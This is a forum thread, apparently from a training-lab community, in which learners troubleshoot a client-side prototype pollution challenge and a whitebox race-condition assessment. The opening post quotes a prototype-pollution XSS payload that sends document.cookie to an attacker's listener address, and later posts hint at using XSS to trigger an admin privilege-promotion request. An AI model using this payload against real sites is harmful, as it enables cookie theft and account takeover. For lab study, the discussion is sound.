I’m stuck on the the client-side prototype pollution challenge. I have the following payload that executed XSS on my end, but when I send the link, I receive no request to my HTTP server:
/profile.php?id=2&__proto__[src][]=data:,$.get("http://<tun0>/?".concat(document.cookie));//
Any help is appreciated.
Anybody managed to find a way to complete the lab? Similarly I am stuck with the admin triggering the exploit. I tried both GET and POST methods and with no-cors for the POST request. Still admin doesn’t trigger the exploit?
Anybody knows what may be the cause for that.
Thank you!
Hello everyone !
Same issue, prototype pollution + XSS works on local, I can grab my own cookies but when sended to admin nothing triggers…
Tried multiple payloads, fetching cookies on local, burp collab, etc…
Can I / We have a hint ? Are they protections to bypass ?
Thanks you !!
You are not supposed to get the admin’s cookie, but rather construct a link that, when the admin clicks on it, will perform an action that will elevate your privileges. A hint is to inspect the admin page.
Thanks for the hint, I didn’t thought about session riding instead of hijacking !!
Have a good day
Hey, I’m stuck on the part on getting the admin to visit the /admin.php?promote=2 page
I’m able to get the XSS by pointing it to a locally hosted JS file. But when I submit a link in the profile.php page, I don’t receive a request. I’ve been stuck on this for days now. Can anyone give a hint? Thank you
To anyone who is still stuck, make sure to URL encode the special chars like: = in the payload
If you’re still stuck, then check your fetch. Maybe the full url isn’t needed?
I got the HTTP GET Request that I need to send in order to elevate my privileges and also I was able to craft a payload that sends a GET Request to a URL which I tested in my HTTP Server.
But if I send it to the forms, it doesn’t get executed and I’m not able to access the dashboard.
Tried using $.get and fetch and none worked.
PS: @ItsSixtyNein hint really did the trick
Guys i know this is out of topic but has anybody solved second part of whitebox attacks skills assessment? stuck on privesc to admin
Yes, I did… Found that the Skills Assessment was easier than some of the sections.
A hint… There aren’t any locks to the DB while querying it.
Still can’t find entry point for race condition. I tried to register an admin user via race condition but even if registration is successful i can’t log in. Also tried race condition on admin.php, but got nothing. Cant find place in code where i can get data before authorization checks via race cond.
On the Prototype Pollution Section or the SA?
If it’s the SA you can DM and I’ll hint you but it’s pretty straight forward.
Hint for anyone stuck in the section question, fully understand each payload shown in the section.